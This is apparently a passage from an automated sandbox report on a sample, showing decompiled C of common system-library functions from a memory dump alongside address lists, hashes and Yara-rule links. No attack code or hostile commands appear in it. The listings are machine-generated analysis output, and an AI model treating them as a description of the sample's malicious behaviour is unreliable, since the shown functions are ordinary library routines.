					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E02BC88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E02B3AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x2beb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x2be84c0;
										if(_t69 >=  *0x2be84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E02BC9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E02AF922A(_t82);
							_t53 = E02B17D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E02BC8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x2be86c0; // 0x6007b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x2be86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x2be86bc;
										_t72 = 0x2be86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E02AF9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x2be86c4;
									_t72 = 0x2be86c0;
									L18:
									E02B29B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                        0x02af9100
                        0x02af9100
                        0x02af9100
                        0x02af9100
                        0x02af9102
                        0x02af9107
                        0x02af910c
                        0x02af9110
                        0x02af9115
                        0x02af9136
                        0x02af9143
                        0x02b537e4
                        0x02b537e4
                        0x02af9149
                        0x02af914e
                        0x02af914e
                        0x02af9117
                        0x02af911d
                        0x00000000
                        0x00000000
                        0x02af911f
                        0x02af9125
                        0x00000000
                        0x02af9151
                        0x02af9158
                        0x02af915d
                        0x02af9161
                        0x02af9168
                        0x02b53715
                        0x00000000
                        0x02af916e
                        0x02af916e
                        0x02af9175
                        0x02af9177
                        0x02af917e
                        0x02af917f
                        0x02af9182
                        0x02af9182
                        0x02af9187
                        0x02af9187
                        0x02af918a
                        0x02af918d
                        0x02af918f
                        0x02af9192
                        0x02af9195
                        0x02af9198
                        0x02af9198
                        0x02af9198
                        0x02af919a
                        0x00000000
                        0x00000000
                        0x02b5371f
                        0x02b53721
                        0x02b53727
                        0x02b5372f
                        0x02b53733
                        0x02b53735
                        0x02b53738
                        0x02b5373b
                        0x02b5373d
                        0x02b53740
                        0x00000000
                        0x00000000
                        0x02b53746
                        0x02b53749
                        0x00000000
                        0x00000000
                        0x02b5374f
                        0x02b53751
                        0x00000000
                        0x00000000
                        0x02b53757
                        0x02b53759
                        0x02b5375c
                        0x02b5375c
                        0x02b5375e
                        0x02b5375e
                        0x02b53761
                        0x02b53764
                        0x00000000
                        0x00000000
                        0x02b53766
                        0x02b53768
                        0x02b537a3
                        0x02b537a3
                        0x02b537a5
                        0x02b537a7
                        0x02b537ad
                        0x02b537b0
                        0x02b537b2
                        0x02b537bc
                        0x02b537c2
                        0x02b537c2
                        0x02b537b2
                        0x02af9187
                        0x02af9187
                        0x02af918a
                        0x02af918d
                        0x02af918f
                        0x02af9192
                        0x02af9195
                        0x00000000
                        0x02af9195
                        0x00000000
                        0x02af9187
                        0x02b5376a
                        0x02b5376a
                        0x02b5376c
                        0x02b5376c
                        0x02b5376f
                        0x02b53775
                        0x00000000
                        0x00000000
                        0x02b53777
                        0x02b53779
                        0x00000000
                        0x00000000
                        0x02b53782
                        0x02b53787
                        0x02b53789
                        0x02b53790
                        0x02b53790
                        0x02b5378b
                        0x02b5378b
                        0x02b5378b
                        0x02b53792
                        0x02b53795
                        0x02b53795
                        0x02b53798
                        0x02b53798
                        0x02b5379b
                        0x02b5379b
                        0x02af91a3
                        0x02af91a9
                        0x02af91b0
                        0x02af91b4
                        0x02af91b4
                        0x02af91bb
                        0x02af91c0
                        0x02af91c5
                        0x02af91c7
                        0x02b537da
                        0x02af91cd
                        0x02af91cd
                        0x02af91cd
                        0x02af91d2
                        0x02af91d5
                        0x02af9239
                        0x02af9239
                        0x02af91d7
                        0x02af91db
                        0x02af91e1
                        0x02af91e7
                        0x02af91fd
                        0x02af9203
                        0x02af921e
                        0x02af9223
                        0x00000000
                        0x02af9223
                        0x02af9205
                        0x02af9208
                        0x02af920c
                        0x02af9214
                        0x02af9214
                        0x02af91e9
                        0x02af91e9
                        0x02af91ee
                        0x02af91f3
                        0x02af91f3
                        0x02af91f3
                        0x02af91e7
                        0x00000000
                        0x02af91db
                        0x02af9187
                        0x02af9168

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 75e1e621a648d6e654159224faad27f712ccb9650900c099ebb28d9f5fe07447
                        • Instruction ID: 20ff66ef84dde10e26a3a279c8a14bd0b6ff0c4165bddc8591505b53e5e53bdd
                        • Opcode Fuzzy Hash: 75e1e621a648d6e654159224faad27f712ccb9650900c099ebb28d9f5fe07447
                        • Instruction Fuzzy Hash: DB3109B1E00646DFDBA5DFE8C0C8B9EB7F2BB48354F1481A9E50467350CB38A984CB55
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B21DB5, Relevance: .1, Instructions: 87COMMON
                        Download Yara Rule
                        C-Code - Quality: 60%
                        			E02B21DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E02B1F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L02B14620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E02B1F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                        0x02b21dc2
                        0x02b21dc5
                        0x02b21dc7
                        0x02b21dcc
                        0x02b21dce
                        0x02b21dd6
                        0x02b21ddf
                        0x02b21de0
                        0x02b21de1
                        0x02b21de5
                        0x02b21de8
                        0x02b21def
                        0x02b21df0
                        0x02b21df6
                        0x02b21df7
                        0x02b21dfe
                        0x02b21e1a
                        0x00000000
                        0x00000000
                        0x02b21e0b
                        0x02b21e12
                        0x02b21e12
                        0x02b21e00
                        0x02b21e00
                        0x02b21e05
                        0x02b21e1e
                        0x02b21e23
                        0x02b6570f
                        0x02b65713
                        0x00000000
                        0x00000000
                        0x02b65719
                        0x02b65719
                        0x02b21e2c
                        0x02b21e2d
                        0x02b21e2e
                        0x02b21e2f
                        0x02b21e31
                        0x02b21e32
                        0x02b21e35
                        0x02b21e3d
                        0x02b65723
                        0x02b6573d
                        0x02b6573d
                        0x00000000
                        0x02b65723
                        0x02b21e49
                        0x02b21e4e
                        0x02b21e4e
                        0x02b21e09
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                        • Instruction ID: 2a1dcad6f5c9ef56f8bff76bc6c2084ce6bb07a932b8effbbda4b7c4ff111758
                        • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                        • Instruction Fuzzy Hash: 9F21BF32610228EBC720DF99CC80EAABBBDEF85644F104095E909A7211D774AE01CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B10050, Relevance: .1, Instructions: 81COMMON
                        Download Yara Rule
                        C-Code - Quality: 53%
                        			E02B10050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x2bed360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E02B29ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E02B3B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E02BC8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E02B29702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x2beb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                        0x02b10055
                        0x02b1005d
                        0x02b10062
                        0x02b1006c
                        0x02b1006f
                        0x02b10074
                        0x02b1007a
                        0x02b1007a
                        0x02b10080
                        0x02b10080
                        0x02b10087
                        0x02b1008d
                        0x02b1008f
                        0x02b10093
                        0x02b10095
                        0x02b1009b
                        0x02b100f8
                        0x02b100fb
                        0x02b100fc
                        0x02b100ff
                        0x02b10108
                        0x02b10108
                        0x02b100a2
                        0x02b100a6
                        0x02b100b3
                        0x02b100bc
                        0x02b100c5
                        0x02b100ca
                        0x02b5c01e
                        0x00000000
                        0x00000000
                        0x02b5c02d
                        0x02b100d5
                        0x02b100d9
                        0x02b5c03d
                        0x02b5c046
                        0x02b5c046
                        0x02b100df
                        0x02b100e2
                        0x02b100ea
                        0x02b100ef
                        0x02b100f2
                        0x02b100f6
                        0x02b10111
                        0x02b10117
                        0x02b10117
                        0x00000000
                        0x02b100f6
                        0x02b100d0
                        0x02b100d0
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 18032410502b28624a61534d306fda4ff3188ae1ac31d7d290b6765319b548f9
                        • Instruction ID: 7570815e066e99fa343223c52d307ada21b662c1d97ea79682c0e721b2b22a80
                        • Opcode Fuzzy Hash: 18032410502b28624a61534d306fda4ff3188ae1ac31d7d290b6765319b548f9
                        • Instruction Fuzzy Hash: 0B319131601B04CFD725DF28C844B96B3E6FF88714F1449ADE89AC7750DB75A841CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B76C0A, Relevance: .1, Instructions: 79COMMON
                        Download Yara Rule
                        C-Code - Quality: 77%
                        			E02B76C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E02B17D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x2be7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L02B14620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E02B3F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E02B17D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E02B39AE0();
						_t23 = L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                        0x02b76c0a
                        0x02b76c0f
                        0x02b76c10
                        0x02b76c13
                        0x02b76c15
                        0x02b76c19
                        0x02b76c1c
                        0x02b76c21
                        0x02b76c28
                        0x02b76c3a
                        0x02b76c2a
                        0x02b76c33
                        0x02b76c33
                        0x02b76c3f
                        0x02b76c48
                        0x02b76c4d
                        0x02b76c60
                        0x02b76c65
                        0x02b76c69
                        0x02b76c73
                        0x02b76c79
                        0x02b76c7f
                        0x02b76c86
                        0x02b76c90
                        0x02b76c94
                        0x02b76ca6
                        0x02b76cb2
                        0x02b76cbd
                        0x02b76cbd
                        0x02b76cc3
                        0x02b76cc7
                        0x02b76ccb
                        0x02b76cd0
                        0x02b76cd1
                        0x02b76ce2
                        0x02b76ce2
                        0x02b76c69
                        0x02b76ced

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2624bf1e7ff070e4ed5168702073321f944ca2f2482240d71961f7fa6259fabd
                        • Instruction ID: 28596dffd0a4fadaa0dbaef7e95f096f7ef434ed6f0c372ed408f9e516107e44
                        • Opcode Fuzzy Hash: 2624bf1e7ff070e4ed5168702073321f944ca2f2482240d71961f7fa6259fabd
                        • Instruction Fuzzy Hash: BB218BB1A00A44AFC715DB69D880E6AB7B8FF48744F1440A9F904DBB91DB34ED10CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B390AF, Relevance: .1, Instructions: 76COMMON
                        Download Yara Rule
                        C-Code - Quality: 82%
                        			E02B390AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E02B4D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E02B2E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L02B14620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E02B3F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E02B2A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                        0x02b390af
                        0x02b390b8
                        0x02b390bb
                        0x02b390bf
                        0x02b390c2
                        0x02b390c2
                        0x02b390c8
                        0x02b390cb
                        0x02b390cd
                        0x02b714d7
                        0x02b714eb
                        0x02b714eb
                        0x00000000
                        0x02b714eb
                        0x02b714db
                        0x02b714e6
                        0x00000000
                        0x02b714f2
                        0x02b714e8
                        0x00000000
                        0x02b714e8
                        0x02b390d8
                        0x02b390da
                        0x02b390dd
                        0x02b390e5
                        0x00000000
                        0x02b39139
                        0x02b390fa
                        0x02b390fe
                        0x02b39142
                        0x00000000
                        0x02b39142
                        0x02b39104
                        0x02b39107
                        0x02b3910b
                        0x02b39110
                        0x02b39118
                        0x02b39147
                        0x02b39148
                        0x02b3914f
                        0x02b39150
                        0x02b39151
                        0x02b39152
                        0x02b39156
                        0x02b3915d
                        0x02b39160
                        0x02b39168
                        0x02b3916c
                        0x02b391bc
                        0x02b391be
                        0x00000000
                        0x02b391be
                        0x02b3916e
                        0x02b39173
                        0x02b39176
                        0x00000000
                        0x00000000
                        0x02b3917c
                        0x02b39180
                        0x02b391b5
                        0x00000000
                        0x02b391b5
                        0x02b39182
                        0x02b39185
                        0x02b39189
                        0x00000000
                        0x00000000
                        0x02b3918e
                        0x02b39190
                        0x02b39198
                        0x00000000
                        0x00000000
                        0x02b391a0
                        0x00000000
                        0x02b391ad
                        0x02b391ad
                        0x02b391b0
                        0x02b391b1
                        0x00000000
                        0x02b39185
                        0x02b3911a
                        0x02b3911c
                        0x02b3911f
                        0x02b39125
                        0x02b39127
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                        • Instruction ID: 86f14f13fa2aaf25e6582246bbc26a0bab5095fb88316356cd458a0b82057f6e
                        • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                        • Instruction Fuzzy Hash: 6E215E71A00A05EFDB21DF59C884EAAF7F8EB44354F1488BAE999A7210D770ED44CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B23B7A, Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        C-Code - Quality: 59%
                        			E02B23B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x2be84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x2be84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L02B14620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x2be84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E02B3AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E02B3FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x2be84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x2be84c4; // 0x0
					L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                        0x02b23b89
                        0x02b23b96
                        0x02b23ba1
                        0x02b23bab
                        0x02b23bb5
                        0x02b23bb9
                        0x02b66298
                        0x02b23bbf
                        0x02b23bc2
                        0x02b23bc3
                        0x02b23bc9
                        0x02b23bca
                        0x02b23bcc
                        0x02b23bcd
                        0x02b23bd4
                        0x02b23bd6
                        0x02b23bdb
                        0x02b23bea
                        0x02b23bf7
                        0x02b23bfb
                        0x02b23bff
                        0x02b23c09
                        0x02b23c0a
                        0x02b23c0b
                        0x02b23c0f
                        0x02b23c14
                        0x02b23c18
                        0x02b23c18
                        0x02b23bfb
                        0x02b23c1b
                        0x02b23c30
                        0x02b23c30
                        0x02b23c3d

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2c524efa06b2d4d182873797134e28ca933410e1eb88a69da67fc9376c315bed
                        • Instruction ID: f3638592a5d3c82636ac978ab55c48a6b19ccbebc72c2831b3fbd46a96b1920f
                        • Opcode Fuzzy Hash: 2c524efa06b2d4d182873797134e28ca933410e1eb88a69da67fc9376c315bed
                        • Instruction Fuzzy Hash: 8021B072A00618EFDB01DF58CD81B6AB7BDFF40348F1500A8E508AB261C775AD55DB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B76CF0, Relevance: .1, Instructions: 74COMMON
                        Download Yara Rule
                        C-Code - Quality: 80%
                        			E02B76CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E02B17D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E02B17D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x2ad5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E02B2F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E02B2F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E02B77016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L02B12400( &_v52);
								}
								_t21 = L02B12400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                        0x02b76cfb
                        0x02b76d00
                        0x02b76d02
                        0x02b76d06
                        0x02b76d0a
                        0x02b76d0e
                        0x02b76d19
                        0x02b76d2b
                        0x02b76d1b
                        0x02b76d24
                        0x02b76d24
                        0x02b76d33
                        0x02b76d39
                        0x02b76d46
                        0x02b76d4f
                        0x02b76d61
                        0x02b76d51
                        0x02b76d5a
                        0x02b76d5a
                        0x02b76d69
                        0x02b76d6b
